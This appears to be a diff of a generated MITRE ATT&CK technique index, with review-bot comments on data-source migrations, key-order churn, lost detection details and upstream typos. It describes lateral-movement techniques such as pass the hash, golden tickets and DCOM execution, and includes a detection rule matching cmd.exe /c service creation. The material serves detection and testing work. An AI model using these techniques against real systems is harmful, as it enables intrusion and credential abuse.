Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) - Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent. + Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) + + Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. 
+ id: attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67 + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true x_mitre_permissions_required: - User - Administrator - SYSTEM - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_detection: |- + Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source. + + Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent. + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Script: Script Execution' + x_mitre_platforms: + - Windows + - macOS + - Linux identifier: T1059.005 atomic_tests: - name: Visual Basic script execution to gather local computer information 
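Review bot: most of the churn in the @@ -56526,32 +59963,36 @@ hunk is key reordering rather than content. `x_mitre_detection`, `x_mitre_platforms`, `x_mitre_is_subtechnique` and `x_mitre_version: '1.1'` are each removed and re-added with identical text, and the one substantive change, the `x_mitre_data_sources` migration from the legacy names (`DLL monitoring`, `Loaded DLLs`, `File monitoring`, `Process monitoring`, `Process command-line parameters`) to the object/component form (`'Command: Command Execution'`, `'Process: Process Creation'`, `'Module: Module Load'`, `'Script: Script Execution'`), sits in the middle of it. Have the generator dump each technique with a fixed key order (sorted, or the order of the upstream STIX object) so that a regeneration only diffs the fields that actually changed; the same churn recurs in the T1059.003, T1210, T1021.004 and T1080 hunks below.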
@@ -56657,46 +60098,45 @@ execution: T1059.003: technique: created: '2020-03-09T14:12:31.196Z' - modified: '2020-03-28T17:02:13.722Z' + modified: '2021-04-14T15:36:02.195Z' kill_chain_phases: - kill_chain_name: mitre-attack phase_name: execution type: attack-pattern + id: attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62 + description: "Adversaries may abuse the Windows command shell for execution. + The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) + is the primary command prompt on Windows systems. The Windows command prompt + can be used to control almost any aspect of a system, with various permission + levels required for different subsets of commands. \n\nBatch files (ex: .bat + or .cmd) also provide the shell with a list of sequential commands to run, + as well as normal scripting operations such as conditionals and loops. Common + uses of batch files include long or repetitive tasks, or the need to run the + same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) + to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) + to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) + interactively with input and output forwarded over a command and control channel." + name: Windows Command Shell + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1059.003 url: https://attack.mitre.org/techniques/T1059/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Windows Command Shell - description: "Adversaries may abuse the Windows command shell for execution. 
- The Windows command shell (cmd.exe) is the primary command prompt - on Windows systems. The Windows command prompt can be used to control almost - any aspect of a system, with various permission levels required for different - subsets of commands. \n\nBatch files (ex: .bat or .cmd) also provide the shell - with a list of sequential commands to run, as well as normal scripting operations - such as conditionals and loops. Common uses of batch files include long or - repetitive tasks, or the need to run the same set of commands on multiple - systems.\n\nAdversaries may leverage cmd.exe to execute various - commands and payloads. Common uses include cmd.exe /c to execute - a single command, or abusing cmd.exe interactively with input - and output forwarded over a command and control channel." - id: attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62 - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_detection: |- Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. 
Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. - x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' identifier: T1059.003 atomic_tests: - name: Create and Execute Batch Script @@ -56818,10 +60258,9 @@ execution: commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)' x_mitre_data_sources: - - Authentication logs - - Netflow/Enclave netflow - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' x_mitre_version: '1.1' x_mitre_is_subtechnique: false identifier: T1047 @@ -57032,17 +60471,17 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:02.024Z' + modified: '2021-04-14T18:09:45.539Z' created: '2020-01-30T17:37:22.261Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls x_mitre_detection: Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. x_mitre_data_sources: - - Office 365 audit logs - - OAuth audit logs + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' x_mitre_contributors: - Shailesh Tiwary (Indian Army) - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC) @@ -57051,6 +60490,7 @@ lateral-movement: x_mitre_platforms: - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1175: technique: 
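Review bot: the T1059.003 description rewrite in the @@ -56657,46 +60098,45 @@ hunk loses the only detection-relevant token in that paragraph. The removed text read "Common uses include cmd.exe /c to execute a single command"; the replacement reads "Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command", so the `/c` argument is gone and the linked software entry is just "cmd". This is upstream ATT&CK text, so there is nothing to change in the generator, but it is worth raising upstream: the `/c` form is exactly what the RDP hijacking detection text further down this file still matches on (`cmd.exe /k` or `cmd.exe /c`).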
@@ -57155,15 +60595,6 @@ lateral-movement: created: '2018-01-16T16:13:52.465Z' x_mitre_deprecated: true x_mitre_version: '2.0' - x_mitre_data_sources: - - PowerShell logs - - API monitoring - - Authentication logs - - DLL monitoring - - Packet capture - - Process monitoring - - Windows Registry - - Windows event logs x_mitre_detection: |- Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) @@ -57241,14 +60672,9 @@ lateral-movement: Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. id: attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd x_mitre_data_sources: - - Windows event logs - - Windows Registry - - Process monitoring - - Packet capture - - DLL monitoring - - Authentication logs - - API monitoring - - PowerShell logs + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' x_mitre_permissions_required: - Administrator - SYSTEM 
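Review bot: the new `x_mitre_data_sources` for T1021.003 in the @@ -57241,14 +60672,9 @@ hunk drop every authentication-related source (`Authentication logs`, `Windows event logs`) and keep only `'Module: Module Load'`, `'Process: Process Creation'` and `'Network Traffic: Network Connection Creation'`, even though the unchanged description is about remotely obtaining execution "in the context of an appropriately privileged user", which on the target host is a network logon. The other remote-service hunks migrated in this same diff (the RDP, SMB, T1021.004 SSH and T1563.001 SSH hijacking entries below) all gain `'Logon Session: Logon Session Creation'`. That is an upstream data question rather than a generator bug, but confirm the mapping before anyone builds detections or test prerequisites off this index.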
@@ -57287,12 +60713,6 @@ lateral-movement: name: powershell T1210: technique: - created: '2018-04-18T17:59:24.739Z' - modified: '2020-02-04T20:14:11.064Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: lateral-movement - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: @@ -57326,6 +60746,14 @@ lateral-movement: name: Exploitation of Remote Services created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: lateral-movement + modified: '2021-04-22T20:23:01.478Z' + created: '2018-04-18T17:59:24.739Z' + x_mitre_contributors: + - ExtraHop x_mitre_version: '1.1' x_mitre_detection: Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause @@ -57336,9 +60764,8 @@ lateral-movement: for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system. x_mitre_data_sources: - - Windows Error Reporting - - Process monitoring - - File monitoring + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' x_mitre_permissions_required: - User x_mitre_platforms: 
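Review bot: in the @@ -57336,9 +60764,8 @@ hunk the T1210 data sources shrink from `Windows Error Reporting`, `Process monitoring`, `File monitoring` to `'Application Log: Application Log Content'` and `'Network Traffic: Network Traffic Content'`, so no host process or file source remains, yet the unchanged detection context immediately above still tells the reader to watch "for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system". If `Application Log Content` is meant to cover the Windows Error Reporting crash logs, the process and file activity the detection text describes still map to nothing in the list. Flag upstream; the regeneration itself is faithful. The two preceding hunks for this technique (@@ -57287,12 +60713,6 @@ and @@ -57326,6 +60746,14 @@) are the same key-reorder churn noted on T1059.005, with one real addition, `x_mitre_contributors: - ExtraHop`.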
@@ -57380,23 +60807,20 @@ lateral-movement: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-17T18:26:41.796Z' + modified: '2021-04-14T14:32:14.273Z' created: '2019-09-04T19:26:12.441Z' x_mitre_is_subtechnique: false x_mitre_data_sources: - - SSL/TLS inspection - - DNS records - - Anti-virus - - Web proxy - - File monitoring - - Mail server - - Office 365 trace logs + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Windows - macOS - Linux - Office 365 - SaaS + - Google Workspace x_mitre_contributors: - Tim MalcomVetter - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) @@ -57408,7 +60832,7 @@ lateral-movement: Micro When Phishing Starts from the Inside 2017)' x_mitre_permissions_required: - User - x_mitre_version: '1.0' + x_mitre_version: '1.1' atomic_tests: [] T1570: technique: @@ -57447,13 +60871,12 @@ lateral-movement: in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.' x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Packet capture - - Process use of network - - Netflow/Enclave netflow - - Network protocol analysis - - Process monitoring + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'File: File Creation' + - 'File: File Metadata' x_mitre_platforms: - Linux - macOS 
@@ -57468,19 +60891,20 @@ lateral-movement: - external_id: CAPEC-644 source_name: capec url: https://capec.mitre.org/data/definitions/644.html - - source_name: NSA Spotting - description: National Security Agency/Central Security Service Information - Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows - Event Log Monitoring. Retrieved September 6, 2018. - url: https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm + - source_name: Stealthbits Overpass-the-Hash + url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/ + description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash + Attacks. Retrieved February 4, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Pass the Hash description: |- - Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. 
This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. - Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.(Citation: NSA Spotting) + When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + + Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash) id: attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e type: attack-pattern kill_chain_phases: 
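Review bot: the @@ -57468,19 +60891,20 @@ hunk removes a constraint that nothing in the replacement text restores. The dropped line "Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.(Citation: NSA Spotting)" went out together with the NSA Spotting reference, and the new paragraphs (the Credential Access sentence and the overpass-the-hash paragraph citing Stealthbits) say nothing about which local account hashes are usable remotely, so a reader of the regenerated description is left with the impression that any captured hash works for lateral movement. Upstream ATT&CK content, so not a generator fix, but worth raising there; at minimum anything in this repo that relied on the old sentence for test prerequisites should know the line is gone.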
@@ -57488,20 +60912,22 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-23T16:24:34.766Z' + modified: '2021-03-15T21:04:33.228Z' created: '2020-01-30T16:36:51.184Z' x_mitre_defense_bypassed: - System Access Controls - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true - x_mitre_detection: Audit all logon and credential use events and review for - discrepancies. Unusual remote logins that correlate with other suspicious - activity (such as writing and executing binaries) may indicate malicious activity. - NTLM LogonType 3 authentications that are not associated to a domain login - and are not anonymous logins are suspicious. + x_mitre_detection: |- + Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious. + + Event ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash) x_mitre_data_sources: - - Authentication logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender - Travis Smith, Tripwire x_mitre_platforms: - Windows 
@@ -57619,6 +61045,10 @@ lateral-movement: description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014. source_name: Campbell 2014 + - source_name: Stealthbits Overpass-the-Hash + url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/ + description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash + Attacks. Retrieved February 4, 2021. - url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017. 
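Review bot: the reference entry added in the @@ -57619,6 +61045,10 @@ hunk is emitted with keys in the order `source_name`, `url`, `description`, while the neighbouring entries in the same `external_references` list use `description`, `source_name` (Campbell 2014) and `url`, `description` (CERT-EU). The content is fine; the inconsistency is the generator serialising each reference mapping in whatever order the upstream object happened to carry. Normalise the key order for reference entries (for example `source_name`, `description`, `url`) so that the same citation appears identically everywhere it is reused; this Stealthbits entry already appears in the T1550.002 hunk above and will be copied again wherever overpass-the-hash is cited.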
@@ -57630,11 +61060,13 @@ lateral-movement: description: |- Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. - In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) + When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. 
A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) - [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) + A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) - [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + + Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash) id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926 type: attack-pattern kill_chain_phases: 
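Review bot: typo in the added line of the @@ -57630,11 +61060,13 @@ hunk: "When preforming PtT, valid Kerberos tickets ..." should read "performing" (the parallel PtH text in the previous hunk has it right: "When performing PtH"). The Golden Ticket paragraph in the same hunk also carries the pre-existing "Key Distribution Service account KRBTGT account NTLM hash" double "account" in both the `-` and `+` versions. Both are upstream ATT&CK text and should be fixed there rather than in this generated file, otherwise the next regeneration reintroduces them.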
@@ -57642,11 +61074,11 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-12T17:03:16.122Z' + modified: '2021-03-15T21:42:11.839Z' created: '2020-01-30T17:03:43.072Z' x_mitre_defense_bypassed: - System Access Controls - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_system_requirements: - Kerberos authentication enabled @@ -57655,7 +61087,9 @@ lateral-movement: Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection) x_mitre_data_sources: - - Authentication logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: - Vincent Le Toux - Ryan Becwar @@ -57739,9 +61173,11 @@ lateral-movement: modified: '2020-03-23T23:24:39.182Z' created: '2020-02-25T18:35:42.765Z' x_mitre_data_sources: - - Process monitoring - - Netflow/Enclave netflow - - Authentication logs + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_detection: |- Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking. 
@@ -57835,9 +61271,10 @@ lateral-movement: - Remote Desktop Users - User x_mitre_data_sources: - - Process monitoring - - Netflow/Enclave netflow - - Authentication logs + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Logon Session: Logon Session Creation' x_mitre_system_requirements: - RDP service enabled, account in the Remote Desktop Users group x_mitre_contributors: @@ -57955,10 +61392,11 @@ lateral-movement: modified: '2020-03-23T23:35:58.129Z' created: '2020-02-25T18:26:16.994Z' x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Netflow/Enclave netflow - - Authentication logs + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_detection: |- Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. 
@@ -58011,19 +61449,13 @@ lateral-movement: will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. x_mitre_data_sources: - - Windows Registry - - Windows event logs - - Process use of network - - Process monitoring - - Process command-line parameters - - PowerShell logs - - Packet capture - - Network protocol analysis - - Netflow/Enclave netflow - - File monitoring - - DLL monitoring - - Authentication logs - - API monitoring + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Network Share: Network Share Access' + - 'Module: Module Load' x_mitre_system_requirements: - Active remote service accepting connections and valid credentials x_mitre_platforms: @@ -58062,8 +61494,10 @@ lateral-movement: x_mitre_is_subtechnique: false x_mitre_version: '1.0' x_mitre_data_sources: - - File monitoring - - Data loss prevention + - 'Process: Process Creation' + - 'File: File Access' + - 'File: File Creation' + - 'Drive: Drive Creation' x_mitre_detection: Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, 
@@ -58149,10 +61583,11 @@ lateral-movement: - User - Administrator x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Authentication logs - - Process use of network + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Logon Session: Logon Session Creation' + - 'Network Share: Network Share Access' x_mitre_system_requirements: - SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system @@ -58278,6 +61713,21 @@ lateral-movement: elevation_required: true T1021.004: technique: + created: '2020-02-11T18:27:15.774Z' + modified: '2020-03-23T23:43:46.977Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: lateral-movement + type: attack-pattern + id: attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6 + description: |- + Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. + + SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell) + name: SSH + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1021.004 
@@ -58288,39 +61738,23 @@ lateral-movement: - source_name: SSH Secure Shell url: https://www.ssh.com/ssh description: SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: SSH - description: |- - Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. - - SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell) - id: attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: lateral-movement - modified: '2020-03-23T23:43:46.977Z' - created: '2020-02-11T18:27:15.774Z' - x_mitre_system_requirements: - - An SSH server is configured and running. - x_mitre_data_sources: - - Authentication logs - - Process use of network - - Network protocol analysis - - Netflow/Enclave netflow + x_mitre_platforms: + - Linux + - macOS + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. 
Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - - macOS + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' + x_mitre_system_requirements: + - An SSH server is configured and running. atomic_tests: [] T1563.001: technique: @@ -58378,7 +61812,11 @@ lateral-movement: x_mitre_system_requirements: - SSH service enabled, trust relationships configured, established connections x_mitre_data_sources: - - Authentication logs + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_contributors: - Anastasios Pingios atomic_tests: [] @@ -58422,9 +61860,6 @@ lateral-movement: x_mitre_deprecated: true x_mitre_is_subtechnique: false x_mitre_version: '1.0' - x_mitre_data_sources: - - File monitoring - - Process monitoring x_mitre_detection: Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use 
